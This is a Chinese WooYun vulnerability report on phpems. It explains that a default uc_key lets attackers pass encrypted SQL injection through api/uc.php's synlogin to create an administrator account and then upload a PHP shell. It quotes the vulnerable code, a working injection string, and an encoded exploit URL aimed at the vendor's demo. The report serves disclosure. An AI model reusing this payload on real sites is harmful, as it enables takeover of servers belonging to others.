当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095619

漏洞标题:phpems设置缺陷直接添加管理员导致getshell

相关厂商:phpems

漏洞作者: Zxsoft

提交时间:2015-02-10 18:54

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

phpems 默认uc_key是1234567890
导致可以用uc的加密函数加密恶意代码带到sql语句中。

详细说明:

if(!defined('IN_UC')) {
error_reporting(0);
set_magic_quotes_runtime(0);

defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
require_once 'config.inc.php';
$_DCACHE = $get = $post = array();
$code = @$_GET['code']; //code=加密代码
parse_str(_authcode($code, 'DECODE', UC_KEY), $get); //到这里进行解密
//var_dump($get);
if(MAGIC_QUOTES_GPC) {
$get = _stripslashes($get); //不明白这里用意,解密后把反斜杠去掉
}
$timestamp = time();
echo $timestamp - $get['time'];
if($timestamp - $get['time'] > 3600) { //time可控
exit('Authracation has expiried');
}
if(empty($get)) {
exit('Invalid Request');
}
$action = $get['action']; //action可控
require_once 'uc_client/lib/xml.class.php';
$post = xml_unserialize(file_get_contents('php://input'));
if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) {
/**
require_once 'include/db_mysql.class.php';
$GLOBALS['db'] = new dbstuff;
$GLOBALS['db']->connect($dbhost, $dbuser, $dbpw, $dbname, $pconnect, true, $dbcharset);
print_r($GLOBALS['db']);
$GLOBALS['tablepre'] = $tablepre;
unset($dbhost, $dbuser, $dbpw, $dbname, $pconnect);
**/
$uc_note = new uc_note();
//file_put_contents('aa.txt','1');
exit($uc_note->$get['action']($get, $post));
} else {
exit(API_RETURN_FAILED);
}
} else {


uc_note->synlogin

function synlogin($get, $post) {
$uid = $get['uid'];
//$username = iconv('gbk','utf-8',$get['username']);
//gbk版本论坛使用上行
$username = $get['username'];
//UTF8版本使用上行
if(!API_SYNLOGIN) {
return API_RETURN_FORBIDDEN;
}
$sql = "set names utf8";
$this->dblink->query($sql);
$sql = "SELECT * FROM ".DTH."user WHERE username = '{$username}'"; //注入点1
$u = $this->dblink->fetch_first($sql);
$args = array();
if(!$u){ //提交个不存在的用户这里$u就为null
$sql = "SELECT * FROM ".DTH."user_group WHERE groupdefault = '1'";
$g = $this->dblink->fetch_first($sql);
$grouid = $g['groupid'];
$email = $username."@phpems.net";
$pass = md5(rand(1000,9999));
$sql = "INSERT INTO ".DTH."user (`username`,`useremail`,`userpassword`,`usergroupid`,`userregtime`,`userregip`) VALUES ('{$username}','{$email}','{$pass}','{$grouid}','".TIME."','".$this->_getClientIp()."')"; //username可控制,是解密后得到的内容 那么就可以直接添加一个管理员
$this->dblink->query($sql);
$args = array('sessionuserid'=>$this->dblink->insert_id(),'sessionpassword'=>$pass,'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$grouid,'sessionlogintime'=>TIME,'sessionusername'=>$username);
}
else
$args = array('sessionuserid'=>$u['userid'],'sessionpassword'=>$u['userpassword'],'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$u['usergroupid'],'sessionlogintime'=>TIME,'sessionusername'=>$u['username']);
if(!$args['sessiontimelimit'])$args['sessiontimelimit'] = TIME;
if(!$this->sessionid)$this->_getSessionId();
$args['sessionid'] = $this->sessionid;
$args['sessiontimelimit'] = TIME;
$data = array('session',$args);
$sql = $this->_makeReplace($data);
$this->dblink->query($sql);


漏洞证明:

官方demo来测试:

phpems.png


现在没有testadmin这个帐号,我们来添加一个
加密这句话然后提交
$str="time=2999999999999999&action=synlogin&username=testadmin','test@test.coom','e10adc3949ba59abbe56e057f20f883e','1','2015-02-04','127.0.0.1')#";

jm.png


www.phpems.net/2014/api/uc.php?code=b843/GkLQIWizbadvdy6o9/js/s0OOsDQZq3KhHhyW2nzNTxN6WfQg%2BnwtL3Qbz3YXVpYmC8ibpOgTv9cGHr3TwHHikzy7GtDTEQukPOXPVUzzraPvurp0F78QTp9/ggYXev9PP/iawD/u0lLkhLuf3a2rMZco0l6lbtBQhOC%2BLLKQldXEcjVN0mRV8GrxkEyOBjq0jWVjMuVlzT%2BFNcfqrej0RPozYcWgs0OOsDQZq3KhHhyW2nzNTxN6WfQg
testadmin 密码:123456
前台就可以登陆,然后点击后台管理,都不用找后台
后台编辑器可以直接上传php文件

phpcms1.png


前人用uc key getshell留下的后门

phpems2.png


其他站点:

qt.png


修复方案:

uc_key使用随机字符串

版权声明:转载请注明来源 Zxsoft@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论